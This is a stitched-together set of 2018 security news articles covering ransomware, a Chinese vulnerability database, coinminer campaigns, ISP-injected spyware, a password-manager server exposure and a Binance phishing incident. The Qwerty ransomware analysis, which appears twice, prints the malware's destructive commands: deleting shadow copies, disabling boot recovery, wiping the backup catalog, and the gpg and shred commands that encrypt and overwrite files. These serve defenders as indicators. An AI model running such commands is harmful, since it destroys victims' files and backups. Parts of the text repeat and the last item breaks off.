ransom note named README_DECRYPT.txt*which contains instructions to contact cryz1@protonmail.com to receive payment instructions. Qwerty Ransom Note Unfortunately, this ransomware is secure and there is no way to decrypt files for free as only the attacker has possession of the private decryption key. Due to the components used to encrypt the computer, the process is very slow, so it may be possible to spot the ransomware in action and shutdown the computer before it encrypts too many files. How to protect yourself from the Qwerty Ransomware In order to protect yourself from ransomware*in general, it is important that you use good computing habits and security software. First and foremost, you should always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack. As Qwerty appears to be installed via hacked Remote Desktop services, it is very important to make sure its locked down correctly. This includes making sure that no computers running remote desktop services are connected directly to the Internet. Instead place computers running remote desktop behind VPNs so that they are only accessible to those who have VPN accounts on your network. It is also important to setup proper account lockout policies so that it makes it difficult for accounts to be brute forced over Remote Desktop Services. You should also have security software that incorporates behavioral detections to combat ransomware and not just signature detections*or heuristics.* For example,*Emsisoft Anti-Malware*and*Malwarebytes Anti-Malware*both contain behavioral detection that can prevent many, if not most, ransomware infections from encrypting a computer. Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all: Backup, Backup, Backup! Do not open attachments if you do not know who sent them. Do not open attachments until you confirm that the person actually sent you them, Scan attachments with tools like*VirusTotal. Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated. Make sure you use have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if your willing to stock with it, could have the biggest payoffs. Use hard passwords and never reuse the same password at multiple sites. For a complete guide on ransomware protection, you visit our*How to Protect and Harden a Computer against Ransomware*article. IOCs Hashes: find.exe: 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9a e558a41841e502 gpg.exe:2b605abf796481bed850f35d007dad24 iconv.dll: aa9ec502e20b927d236e19036b40a5da5ddd4ae030553a6608 f821becd646efb key.bat: 554c6198a015dc87e394c4fc74bf5040c48829d793e302632f 9eec663733a09e libiconv2.dll: 3ec2d1a924ef6f19f2db45e48b9cf4b74a904af5720100e3da 02182eee3bcf02 libintl3.dll: b92377f1ecb1288467e81abe286d1fd12946d017e74bd1ab5f b2f11e46955154 ownertrust.txt: d06ffa2b486cd0601409db821d38334d0958bf8978f6773309 08a4c3c87a2b48 qwerty-pub.key: dc1f6d197904a59894a9b9e66f0f6674766c49151a8ced2344 dfaadaf54330b8 run.js: 6a6722b3b177426ec9ebb27898ef2340208c5644eb56eb5b06 4f2b2e34bf20bf shred.exe: 7eae0a885c7ef8a019b80d55a00e82af2e9a9465b052156490 ff822ac68bc23a Associated Files: README_DECRYPT.txt Ransom Note Text: Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612.Note! You have only 72 hours for write on e-mail (see below) or all your files will be lost! Associated Emails: cryz1@protonmail.com Executed Commands: taskkill /F /IM sql /T taskkill /F /IM chrome.exe /T taskkill /F /IM ie.exe /T taskkill /F /IM firefox.exe /T taskkill /F /IM opera.exe /T taskkill /F /IM safari.exe /T taskkill /F /IM taskmgr.exe /T taskkill /F /IM 1c /T vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set {default} recoveryenabled no wbadmin.exe wbadmin delete catalog -quiet del /Q /F /S %s$recycle.bin
  13. Chinese intelligence agencies are doctoring the Chinese National Vulnerabilities Database (CNNVD) to hide security flaws that government hackers might have an interest in, according to a report released on Friday by US threat intelligence firm Recorded Future. The US company says it noticed in recent months mass edits to the CNNVD website. Recorded Future says CNNVD operators have been backdating the publication dates for hundreds of vulnerabilities. Backdating started after a previous Recorded Future report The backdating operations started after the publication of a Recorded Future report in November last year in which Recorded Future described how CNNVD delays the disclosure of critical bugs to give Chinese cyber intelligence agencies the time to evaluate the operational utility of said vulnerabilities. Recorded Future has been taking snapshots of the CNNVD website in the past year and has detected backdating edits to at least 267 critical vulnerabilities. For example, the publication data of CVE-2016-10136, a vulnerability in the Adups firmware included with many smartphones has been backdated 235 days, while the Office CVE-2017-0199 vulnerability has been backdated 57 days. Backdating done to hide "vulnerability evaluation" program "CNNVD’s manipulation of its vulnerability publication data ultimately reveals more than it conceals," the Recorded Future team says. "First, the selective backdating of vulnerability publication for the outliers is essentially a tacit confirmation from CNNVD of their vulnerability evaluation program and the operational use of some delayed vulnerabilities. "Second, while many think of the MSS (Ministry of State Security) as primarily a foreign intelligence service, it also has a large, and arguably more important, domestic intelligence mandate." Recorded Future analysts argue that the delay in disclosure and backdating of critical flaws were most likely carried out to hide security flaws from local companies, those expected to rely on the database for daily patching operations. This was done to aid surveillance of Chinese internal entities. Nonetheless, experts now believe that because of the new backdating practice, foreign cyber intelligence agencies will have a harder time in spotting the critical flaws that MSS and its hackers are evaluating and pondering for their cyber arsenal. This will make preparing countermeasures much harder for foreign states. In its November report, Recorded Future also revealed that CNNVD was housed in the same building as China’s Ministry of State Security (MSS), and was most likely under its firm control. The US cyber intelligence firm had previously revealed that MSS was in charge of China's international hacking efforts, and was commanding Chinese-linked APT groups through government contractors —such as APT3. Chinese officials have also recently banned Chinese security researchers from attending a foreign security conference, hoping to keep them from disclosing security flaws to western firms.
  14. Windows Server, Apache Solr, and Redis servers have been targeted this week by cyber-criminals looking to take over unpatched machines and install malware that mines cryptocurrency (known as a coinminer). Two separate campaigns have been spotted, both very active this week. One by the Imperva crew, targeting Redis and Windows Servers, and another by the ISC SANS team, targeting Apache Solr installations. Campaign targeting Redis and Windows Server The most active of the two was a campaign that Imperva nicknamed RedisWannaMine. This campaign is ongoing, and according to Imperva, cyber-criminals have been compromising servers by mass-scanning the Internet for systems running outdated Redis versions that are vulnerable to the CVE-2017-9805 exploit. Once criminals gain access to a host, their typical infection chain is to drop the ReddisWannaMine malware that later installs a scond-stage cryptocurrency miner. But the ReddisWannaMine campaign also displays the classic behavioral pattern of a self-propagating worm. This is because attackers also use the same infected servers to mass-scan and later exploit other targets. However, the ReddisWannaMine attackers aren't only targeting other Redis servers, but are also looking for Windows Servers with exposed SMB ports. For these latter Windows Servers instances, attackers deploy the now classic leaked NSA exploit EternalBlue. In these infections, too, they also drop a coinminer on the Windows Server machines they compromise, showing that cryptocurrency is the primary objective of these attacks. This isn't the first time that a coinminer campaign has targeted Redis servers. Earlier in February made almost $1 million by infecting Redis and OrientDB servers with similar coinminer malware. Campaign targeting Apache Solr But besides the ReddisWannaMine crew, there was another very active cyber-criminal group this week. This second one targeted Apache Solr servers that hadn't received patches for the CVE-2017-12629 vulnerability. Just like in the ReddisWannaMine incidents, attackers focused on infecting victims with a cryptocurrency miner. ISC SANS researchers didn't notice any self-propagation mechanism, meaning scans and infections were taking place from a central location, but they did manage to determine an approximate number of affected servers —1,777— infections that appear to have taken place between February 28 and March 8. But while Redis and Windows Servers are standalone systems that are easier to patch, Apache Solr (search servers) are in many cases embedded in other more complex software, and patching isn't as easy at it sounds because updating Solr might sometimes breaking internal systems that depend on it.
  15. A massive survey of nearly 1,200 IT security practitioners and decision makers across 17 countries reveals that half the people who fell victim to ransomware infections last year were able to recover their files after paying the ransom demand. The survey, carried out by research and marketing firm CyberEdge Group, reveals that paying the ransom demand, even if for desperate reasons, does not guarantee that victims will regain access to their files. Timely backups are still the most efficient defense against possible ransomware infections, as it allows easy recovery. Over a quarter of all victims lost their data for good The survey reveals that 55% of all responders suffered a ransomware infection in 2017, compared to the previous year's study, when 61% experienced similar incidents. Of all the victims who suffered ransomware infections, CyberEdge discovered that 61.3% opted not to pay the ransom at all. Some lost files for good (8%), while the rest (53.3%) managed to recover files, either from backups or by using ransomware decrypter applications. Of the 38.7% who opted to pay the ransom, a little less than half (19.1%) recovered their files using the tools provided by the ransomware authors. The rest (19.6%) lost their data. Ransomware authors either didn't provide ransomware decryption instructions or apps, or these tools did not yield expected results. Overall, the study found that over a quarter of ransomware victims (27.6%) lost their data for good, either by paying or not paying the ransom demand. Other findings of the CyberEdge survey are below: ?* 77% of all organizations suffered a form of cyber-attack in 2017 (down from79% in 2016). ?* Security-related budgets are prognosticated to rise in 2018 with 4.7% compared to last year. ?* Security-related budgets are expected to account for 12% of the overall IT budget for companies in 2018. ?** Four in five organizations said they are experiencing a shortage of personnel with IT security skills. ?* Nine in ten companies are experiencing cloud-related security and privacy problems. ?* Survey respondents said they perceive mobile devices and app containers (Docker, Kubernetes, Cloud Foundry) as their organization's weakest link in terms of security. ?* Respondets said they plan to invest money in 2018 in advanced malware analysis/sandboxing (network security), containerization/micro-virtualization (endpoint and mobile security), and API gateway (application and data-centric security)
  16. According to a sleuthing Windows Insiders, the name of the next Windows feature update appears to be named "Spring Creators Update". This is based on the output of a command entered in the latest Insider Preview build from the skip ahead ring.Yesterday, a Twitter user who goes by the name*WalkingCat*asked his followers to run the PowerShell command "Get-VMHostSupportedVersion" on build 17618, which the latest skip ahead version available to Insiders.**Someone responded with a picture that clearly shows the next update is being named Spring Creators Update with a build number of 1803 and a version number of 8.3. pic.twitter.com/5bMdXY6QeM— Pennybridge1969 (@warnelidl) March 8, 2018 To explain how this works, it is important to understand the various builds that are available to Insiders. The next version of Windows 10 is codenamed RS4, or Redstone 4, and the version after that is RS5, or Redstone 5. For most insiders, they are previewing the builds associated with RS4, which the next update to to be released this Spring and what this article is about.There are some insiders, though, who are in the skip ahead ring. This means they are given builds for the RS5 build that will probably be released sometime during the summer of 2018. Now, the PoweShell command*Get-VMHostSupportedVersion*lists all the Hyper-V virtual machine configuration versions that are supported on a particular host. This list will contain the name of the previous Windows 10 version. Since the RS5 build 17618 comes out after the RS4 build, when you run this command on it will display the names of the previous Windows 10 versions. This includes the RS4 build that will be released before it. This is why the output of this command on a RS5 build pretty much confirms that the next update will be called Spring Creators Update. The Spring Creators Update includes some new features such as Timeline &*Sets (File Explorer with Tabs!), Edge and Cortana improvements, new privacy setting layouts, and People.
  17. A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program*to encrypt a victim's files.* Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file's name. It goes without saying, that GnuPG is a legitimate programs being illegally used by the Qwerty Ransomware developers. While a ransomware*using GnuPG to encrypt files is not unique as it has been done in the past with VaultCrypt and KeyBTC, it is not something that is commonly seen. While it is not known for sure how this ransomware is being distributed, it appears likely that it is manually installed by the attacker when they hack into computer running Remote Desktop Services.* First discovered by MalwareHunterTeam, we did not have the full package in order to fully analyze it. This week MalwareHunterTeam was able to find the complete package hosted on a site so that we could analyze it further. How the Qwerty Ransomware encrypts a computer The Qwerty Ransomware consists of a package of individual files that are run together to encrypt a computer. This package consists of the GnuPG*gpg.exe*executable, the*gnuwin32*shred.exe file, a batch file that loads the keys and launches a JS file, and a JS file that is used to launch the find.exe program. Qwerty Ransomware Package The first file to be launched is the key.bat file. This file acts as the main launcher for the ransomware by executing various commands sequentially. Batch File When the batch file is executed, the keys will be imported as shown below. Importing Keys After the keys are imported, the batch file will launch run.js. This file will execute the find.exe program, which is the main ransomware component. When executing find.exe, it will specify a particular drive letter that it tries to encrypt. JavaScript File When find.exe is executed it will launch the following commands on the victim's computer. taskkill /F /IM sql /T taskkill /F /IM chrome.exe /T taskkill /F /IM ie.exe /T taskkill /F /IM firefox.exe /T taskkill /F /IM opera.exe /T taskkill /F /IM safari.exe /T taskkill /F /IM taskmgr.exe /T taskkill /F /IM 1c /T vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set {default} recoveryenabled no wbadmin.exe wbadmin delete catalog -quiet del /Q /F /S %s$recycle.bin It will then begin to encrypt each drive on the computer by executing the following command when it encrypts a file: gpg.exe --recipient qwerty -o "%s%s.%d.qwerty" --encrypt "%s%s" This command will encrypt the file using the imported public key and then save it as a new file under the same name, but now with the*.qwerty extension appended to it. For example, test.jpg would be encrypted and saved as test.jpg.qwerty. Encrypted Qwerty Files When encrypting files, it will encrypt any file that does not contain the following strings: Recycle temp Temp TEMP windows Windows WINDOWS Program Files PROGRAM FILES ProgramData gnupg .qwerty README_DECRYPT.txt .exe .dll After it encrypts a file it will run the shred.exe file on the original file in order to overwrite it. shred -f -u -n 1 "%s%s" It should be noted that it only overwrites files once, so they may be recoverable with file recovery software. The use of only one wipe is a tradeoff between speed and securely deleting the file. In each folder that a file is encrypted, it will create a ransom note named README_DECRYPT.txt*which contains instructions to contact cryz1@protonmail.com to receive payment instructions. Qwerty Ransom Note Unfortunately, this ransomware is secure and there is no way to decrypt files for free as only the attacker has possession of the private decryption key. Due to the components used to encrypt the computer, the process is very slow, so it may be possible to spot the ransomware in action and shutdown the computer before it encrypts too many files. How to protect yourself from the Qwerty Ransomware In order to protect yourself from ransomware*in general, it is important that you use good computing habits and security software. First and foremost, you should always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack. As Qwerty appears to be installed via hacked Remote Desktop services, it is very important to make sure its locked down correctly. This includes making sure that no computers running remote desktop services are connected directly to the Internet. Instead place computers running remote desktop behind VPNs so that they are only accessible to those who have VPN accounts on your network. It is also important to setup proper account lockout policies so that it makes it difficult for accounts to be brute forced over Remote Desktop Services. You should also have security software that incorporates behavioral detections to combat ransomware and not just signature detections*or heuristics.* For example,*Emsisoft Anti-Malware*and*Malwarebytes Anti-Malware*both contain behavioral detection that can prevent many, if not most, ransomware infections from encrypting a computer. Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all: Backup, Backup, Backup! Do not open attachments if you do not know who sent them. Do not open attachments until you confirm that the person actually sent you them, Scan attachments with tools like*VirusTotal. Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated. Make sure you use have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if your willing to stock with it, could have the biggest payoffs. Use hard passwords and never reuse the same password at multiple sites. For a complete guide on ransomware protection, you visit our*How to Protect and Harden a Computer against Ransomware*article. IOCs Hashes: find.exe: 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9a e558a41841e502 gpg.exe:2b605abf796481bed850f35d007dad24 iconv.dll: aa9ec502e20b927d236e19036b40a5da5ddd4ae030553a6608 f821becd646efb key.bat: 554c6198a015dc87e394c4fc74bf5040c48829d793e302632f 9eec663733a09e libiconv2.dll: 3ec2d1a924ef6f19f2db45e48b9cf4b74a904af5720100e3da 02182eee3bcf02 libintl3.dll: b92377f1ecb1288467e81abe286d1fd12946d017e74bd1ab5f b2f11e46955154 ownertrust.txt: d06ffa2b486cd0601409db821d38334d0958bf8978f6773309 08a4c3c87a2b48 qwerty-pub.key: dc1f6d197904a59894a9b9e66f0f6674766c49151a8ced2344 dfaadaf54330b8 run.js: 6a6722b3b177426ec9ebb27898ef2340208c5644eb56eb5b06 4f2b2e34bf20bf shred.exe: 7eae0a885c7ef8a019b80d55a00e82af2e9a9465b052156490 ff822ac68bc23a Associated Files: README_DECRYPT.txt Ransom Note Text: Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612. Note! You have only 72 hours for write on e-mail (see below) or all your files will be lost! Associated Emails: cryz1@protonmail.com Executed Commands: taskkill /F /IM sql /T taskkill /F /IM chrome.exe /T taskkill /F /IM ie.exe /T taskkill /F /IM firefox.exe /T taskkill /F /IM opera.exe /T taskkill /F /IM safari.exe /T taskkill /F /IM taskmgr.exe /T taskkill /F /IM 1c /T vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set {default} recoveryenabled no wbadmin.exe wbadmin delete catalog -quiet del /Q /F /S %s$recycle.bin
  18. Türk Telekom, a Turkish Internet Service Provider (ISP), has deployed special hardware to intercept and alter Internet traffic, swapping legitimate software downloads with similar applications, but infected with spyware. A Citizen Lab report claims that Türk Telekom has deployed Sandvine PacketLogic middleboxes in five regions across the country. These devices are powerful traffic interception machines that can allow the ISP to spy on unencrypted traffic, and even alter its content by injecting additional code. Middleboxes used as malware delivery system According to the report, the devices deployed on the network of this ISP have been used as a malware delivery system. Researchers spotted the middleboxes redirecting users attempting to download software from official websites to pages offering the same software but injected with the FinFisher spyware. In later cases, researchers say the payload switched from FinFisher to another spyware strain named StrongPity. Citizen Lab says it identified such redirects when users tried to download the Avast Antivirus, CCleaner, VLC, Opera, and 7-Zip from their official websites. Additionally, the ISP also tainted some software downloads hosted on CNET's Download.com platform in a similar manner, offering the spyware-infected version instead of the legitimate app. These download switcheroos didn't happen for everyone. Citizen Lab says it identified 259 IP addresses for which the middleboxes replaced downloaded software. Some IPs belonged for users located in Syria, where some Türk Telekom subscribers provided Internet access via cross-border directional Wi-Fi links. Government involvement highly probable But researchers don't believe this is the work of a rogue employee. This is because the same ISP middleboxes have been used to censor access to various political domains —such as the website of the Kurdistan Workers’ Party (PKK), Wikipedia, and the website of the Dutch Broadcast Foundation (NOS). Furthermore, FinFisher isn't your regular run-of-the-mill malware. This is a very expensive "lawful intercept" product sold only to government agencies by the eponymous FinFisher company, a provider of government-grade surveillance technology. The censorship of political domains and the deployment of spyware made available only to law enforcement suggests a heavy involvement of the Turkish government into the traffic interception scheme. It is unclear if the government was going after dissidents or was cracking down on Syrian Kurdish troops, against which Turkish forces are engaged in military campaigns. The Citizen Lab report describes two cyber-espionage campaigns that ESET detailed in reports published in September and December 2017. ESET detected the same thing —an ISP tampering with user app downloads— but did not reveal the ISP and country's name. The September report claimed an ISP was distributing the FinFisher spyware, while the December report detailed the StrongPity spyware distribution campaign. Similar middleboxes detected in Egypt as well But besides the Türk Telekom middleboxes, Citizen Lab researchers found similar devices deployed on the network of Telecom Egypt, an Egyptian ISP. Researchers say these middleboxes blocked access to dozens of human rights, political, and news websites including Human Rights Watch, Reporters Without Borders, Al Jazeera, Mada Masr, and HuffPost Arabic The Egyptian ISP didn't deliver spyware by replacing download attempts, but it did inject ads and in-browser cryptocurrency miners inside its subscribers' Internet traffic, most likely as a money-making scheme. A wealth of additional details can be found in Citizen Lab's much detailed report on these two campaigns.
  19. Keeper, an embattled password manager maker currently suing a news reporter for defamation, left a server hosting the company's installer files exposed with full permissions, allowing anyone to access and replace files with malicious content, a security researcher told ZDNet. Chris Vickery, who found the exposed server, immediately notified ZDNet of the exposure. We reached out to Keeper by phone and email on Friday. Within an hour of disclosure, the server had been secured. Keeper executive Aaron Gessner denied the claims. "Since we did not receive any report from a security researcher and because it's not a production-facing bucket, we decided to revoke all read and write access while we investigate this report we received from Zack Whittaker at 2pm CST, on March 9," said Gessner. "This bucket was not public writable, despite the report. Also, there were no private keys in this bucket." ZDNet followed up after Keeper's statement in an email. "We are continuing to investigate your email and will reply when we have completed a thorough investigation," Gessner replied. The Chicago, Ill.-based company owns an Amazon S3 storage server to host installer for its various supported platforms. But the server wasn't password protected, and it gave anyone accessing the server "full control" over its contents, including reading, replacing, and deleting files. Many of the files included archived copies of the company's Windows, Mac, Android, and iPhone install files. One file on the server was a private code-signing certificate issued by Apple. The certificate, also known as a key, which can be used to sign the company's iPhone and iPhone apps, was issued to Callpod Inc., a company founded by Keeper chief executive Darren Guccione. It's plausible that a skilled attacker could have replaced a legitimate iPhone or iPad installer with a malicious file. It's not clear is if the company's website was directly linking to the files on the exposed server, making it near impossible to determine the risk -- if any -- to customers. Keeper recently -- and controversially -- sued Ars Technica's security editor, Dan Goodin, over a story he wrote about a vulnerability in Keeper's password manager's browser extension. Although the company confirmed the vulnerability, Goodin was later named in a defamation suit for allegedly making "false and misleading statements about the Keeper software application suggesting that it had a 16-month old bug that allowed sites to steal user passwords." The news sparked anger in the security community, which criticized the company's response. Many high-profile researchers and well-known figures in the community argued that such action will likely have a chilling effect on future security research and vulnerability disclosure. Goodin's lawyers filed a motion to dismiss the case, but Keeper -- still under pressure from the security community -- doubled down on its case this week and filed a motion opposing Goodin's efforts to end the suit.
  20. Hackers are distributing a newly discovered form of trojan malware that offers full access to infected Windows PCs.Dubbed FlawedAmmyy, the malware is built on top of leaked source code for a legitimate app -- Version 3 of Ammyy Admin remote desktop software -- and enables attackers to secretly snoop on those duped into installing it. The RAT [Remote Access Trojan] is capable of complete remote desktop control, providing hackers with full access to the system and the opportunity to steal files, credentials and more. The malware also has the potential to abuse audio chat. While those behind FlawedAmmyy attempt to deliver it in bulk using massive phishing campaigns, they're also engaging in narrower campaigns targeting specific sectors, with attacks focused on the automotive industry among others. This campaign to infect PCs with FlawedAmmyy was active just days ago. A previously undocumented malware, FlawedAmmyy has been uncovered by researchers at Proofpoint who say the group behind it has been actively deploying the trojan since January 2016. The organisation behind the attacks is thought to be TA505, a prolific hacking group that has been active since 2014, and has previously targeted victims using the Dridex banking trojan, Locky ransomware, Jaff ransomware and more in wide ranging campaigns. See also: What is malware? Everything you need to know about viruses, trojans and malicious software Attempts at delivering FlawedAmmyy are similar to those schemes, with messages sent out with subjects relating to receipts, bills and invoices and an email attachment in form of a .ZIP file purporting to be related to a transaction. A phishing email used to distribute the malware. Image: ProofpointThe ZIP file contains .url files which are designed to serve as links to websites and automatically launch a web browser. In this case, the files are used to connect to a "file://" instead of a "http://" link, meaning that if the victim opens the attachment, the system downloads and executes JavaScript over the Server Message Block (SMB) protocol instead of the browser. Researchers say this is the first instance of these two elements being combined to infect systems with malware. Once the SMB protocol has been called, the JavaScript downloads Quant Loader, which in turn fetches the final payload and installs FlawedAmmyy on the infected PC. "We have seen FlawedAmmyy in both massive campaigns, potentially creating a large base of compromised computers, as well as targeted campaigns that create opportunities for actors to steal customer data, proprietary information, and more," said researchers at Proofpoint. The trojan doesn't provide victims with any major flags their computer has been infected. In order to avoid infection, users should avoid clicking on unexpected and strange links -- especially from unknown senders. "As always, users should not open attachments from senders they do not know and should be cognisant of security warnings when opening files. Layered defences at the email gateway, IDS, and endpoint can all provide important protection for threats of this nature," said researchers. ZDNet has attempted to contact the makers of Ammyy Admin about hackers use of the leaked code, but no response has been received at the time of writing.
  21. Malwarebytes*has released a new version of their flagship product, Malwarebytes 3.4.4,*that includes an enhanced detection and cleaning engines, an updated user interface, more useful notifications, and the fixing of the damn stacked notifications bug.* If you are already using Malwarebytes, the next time you perform an update, it will alert you that a new version is ready to download. What has changed under the hood The changes that are really important are under the hood as part of the scanning engine. This includes better detection and cleaning of hijacked shortcuts, including browser shortcuts, and scheduled tasks that launch malware or web pages. Both of these methods have become more common for adware, hijackers, and miners*to utilize as a way to launch their payloads. Another change is an improved detection and cleaning of systems that are heavily infected with malware. If a system becomes bogged down with adware, trojans, PUPs, and miners, the performance of Malwarebytes*will suffer greatly. This change*supposedly increases the performance of scans on these types of systems. I have not been able to test this myself, though, so we will need to see if this update*makes much of a difference. User interface changes The more noticeable changes are in the user interface. With this release, we have some UI bug fixes, changes in how notifications are displayed, a new detection reports screen, and a notifications center. Stacking notifications fixed One of the items that I am very happy to see resolved is the notification stacking issue. In the past this would cause notifications for the same thing to stack over time. So if you were away from your computer for an extended period of time, you would be greeted with multiple notifications for the same issue that you would need to close independently. New website blocked notification Another change is*a new design for the website blocked notification alerts. The older alerts were uglier and contained little information as to why the site was blocked. This new alert displays a cleaner looking alert that now contains the reason why the site was blocked. Old Notification *New Notification New detection reports interface The reports for detected items have also been given a facelift. In the past all the details for the detected item were put in one screen of the report. With version 3.4.4, the first page of the report now contains basic information and then you can click on the Advanced tab to see more detailed information. You can click on the images below to see what the reports look like in greater detail. New Report Screen Separate advanced details page Notifications Center As notifications in Malwarebytes are set to disappear by default after a short period of time, it is not uncommon to miss a notification. With this version, Malwarebytes*introduced a new Notifications Center than can be used to see the latest notifications displayed by Malwarebytes. Malwarebytes Notification Center For a complete list of changes in Malwarebytes 3.4.4, you can view the changelog below. Performance/protective capability • Improved remediation for shortcuts and tasks • Added better handling for heavily infected systems to streamline detection & remediation • Continued improvements to overall protection, detection and remediation Usability • Added Notification Center for easy access to most recent real-time block notifications (NOTE: you will see this in dashboard header, but currently it won't display for first time until after a real-time block event has occurred) • Added category to website blocked notification to show the reason why site was blocked • Improved report design for better usability • Added device name to My Account screen in preparation to sync with My Account portal • Updated the API used to interact with Windows Action/Security Center • Changed the 'Recover if missed by' setting for Scheduled Scans to be enabled by default for new scans • Numerous other user interface and copy improvements Stability/issues fixed • Fixed issue where files did not save properly with anti-ransomware enabled • Fixed issue where notifications could stack so you might see multiple versions of same message • Fixed issue where Beta opt in setting would not honor Restore Defaults • Updated the 7-Zip library to the latest version, v.18.01 • Improved upgrade process from earlier versions of Malwarebytes • Continued improvements to driver operation and management • Fixed several crashes, including a blue screen related to Web Protection • Addressed other miscellaneous defects
  22. While most of today's banks and e-commerce sites have their front doors locked, there's a side door that many still leave open: connections to third party scripts. We caught up with Hadar Blutrich, CEO of Israeli startup Source Defense, to hear about the solution that his team has cooked up to take control of these scripts.You can watch the video interview above or read the transcript below. Blutrich told ZDNet, "While creating Source Defense, we found out that almost any website in the world can be hacked using the third party scripts on the page. It doesn't matter if it's a bank, or if it's an e-commerce [site], or any other type of website. We were able to demonstrate that when we are hacking one of the third parties, we are able to get full accessibility to the page, change the page, add information to the page, and get any information back, including user credentials, including manipulating the [buyer's] order to buy... "We saw a text from an analytic program that the user doesn't even know about them. We saw a text from advertisement. We even saw a latest attack using an accessibility program into the website. More than 4,000 different websites, government websites were compromised last month because of an attack to a third party that helped people with disabilities to access the websites." SEE: Intrusion detection policy | Encryption policy (Tech Pro Research) He continued, "The problem with the third parties is that everything happening in those third party scripts is happening in the client side. Which means that all of the measures of defense, of cyberdefense that a website has, are being done by that time. You are finished with the firewall, you finished with the SSL, and only then you are calling those third parties. It means that the bank has no visibility to what they are doing on the page and don't have any way to prevent them from doing stuff that they are not supposed to do. "Source Defense is creating what we call virtual pages. We are isolating the different third parties into virtual pages in the memory of the browser. Each one of those third parties is being run on the virtual page and can only see information that is allowed for it to see. When that same third party is trying to write information back to the page, we decide which part of it should be reflected back to the page and which should not." SEE: Cyberwar and the Future of Cybersecurity (ZDNet/TechRepublic special report) | Download as PDF (free registration required) Blutrich added, "For example, if a third party is trying to get access to the user name and password in the virtual page, the user name and password will never appear. He will not be able to see them in a virtual pages. If a third party is trying to write information to the page such as 'naughty poo propaganda,' we can prevent it from appearing in the real page. "It really depends on the industry and on the type of the page, but we can see between five different third parties to sometimes 120 third parties. It basically means that you have 120 different open doors on the page, that if a hacker gets into them you will not even know that he was able to get access to the website. "In a lot of the cases, third parties are slowing up the page. The reason is that the third party is loading synchronically and the page waits for it to be loaded. With Source Defense, what happened as a byproduct is that all of the third parties have been loaded into the virtual pages and therefore the actual page that you are looking at is loading faster in most cases." Also see
  23. One of the most requested features that Windows 10 Insiders have been asking for is the addition of tabs to File Explorer. Well yesterday, for those 22 thousand+ insiders who voted for this feature, Microsoft released insider preview build 17618 that includes tabs in File Explorer as part of its Sets feature!Windows 10 Sets is an upcoming feature where you can group documents and apps into one tabbed window that are related to the particular task at hand. This feature was released for testing to a small controlled group of insiders in Insider Preview Build 17063*and was subsequently removed after the test. [embedded content] With build 17618, Sets are back and with it come tabs in File Explorer. You can now open different folders in the same File Explorer window with each one having their own tabs. This way one File Explorer window can have a tab for the pictures folder, a tab for the documents folder, and a tab for your documents, which you can easily switch between. Tabs in File Explorer as part of the Sets Feature If you look closely, though, the*Sets feature does more than just allow you to have different tabs for different folders, but also allows you to add applications as a tab in File Explorer. According to Microsoft, in addition to File Explorer, Notepad, Command Prompt, and Powershell are also getting tabbed support. While this may be useful to some, I would have personally have preferred that tabs in File Explorer*be limited to folders and libraries. I do not need a tab for Word or Edge in File Explorer. Unfortunately, as I am not on the skip ahead ring, I won't be able to test this feature and see how it works. For those of you who are, please let us know your experiences and if this is the tabbed File Explorer you have been waiting for.
  24. Binance, one of the largest cryptocurrency exchanges on the Internet, said today that hackers and a well-executed phishing campaign are to blame for the Bitcoin sell-offs from yesterday's afternoon.The incident the company is referring to happened late yesterday afternoon (Mar 7, UTC 14:58-14:59), when thousands of user accounts started selling their Bitcoin and buying an altcoin named Viacoin (VIA). The incident looked like a hack, and users reacted accordingly, with many complaining on social media, such as Twitter and Reddit. "Wtf??? All my coins got sold and I brought [Viacoin]? Did I just get hacked?," a Reddit user wailed. But this wasn't a hack, or at least not your ordinary hack. The way this was done was incredibly clever. Hackers ran a tw-month phishing campaign According to an incident report published by the Binance team, in preparation for yesterday's attack, the hackers ran a two-month phishing scheme to collect Binance user account credentials. Hackers used a homograph attack by registering a domain identical to binance.com, but spelled with Latin-lookalike Unicode characters. More particularly, hackers registered the b?n?nce.com domain —notice the tiny dots under the "i" and "a" characters. Phishing attacks started in early January, but the Binance team says it detected evidence that operations ramped up around February 22, when the campaign reached its peak. Binance tracked down this phishing campaign because the phishing pages would immediately redirect phished users to the real Binance login page. This left a forensic trail in referral logs that Binance developers detected. The company's CEO shared a screenshot of one of these logs on Twitter, yesterday. Hackers gained access to accounts and generated API keys After getting access to several accounts, instead of using the login credentials to empty out wallets, hackers created "trading API keys" for each account. With the API keys in hand, hackers sprung their main attack yesterday. Crooks used the API keys to automate transactions that sold Bitcoin held in compromised Binance accounts and automatically bought Viacoin from 31 other Binance accounts that hackers created beforehand, and where they deposited Viacoin, ready to be bought. But hackers didn't know one thing —Binance's secret weapon— an internal risk management system that detected the abnormal amount of Bitcoin-Viacoin sale orders within the span of two minutes and blocked all transactions on the platform. For once, it was the hackers who lost money Hackers tried to cash out the 31 Binance accounts, but by that point, Binance had blocked all withdrawals. Furthermore, in the subsequent investigation, Binance identified the 31 accounts, reversed all transactions, and confiscated the original Viacoin funds that hackers deposited in the accounts. So, in the end, the hackers actually lost both money and time carrying out this attempted 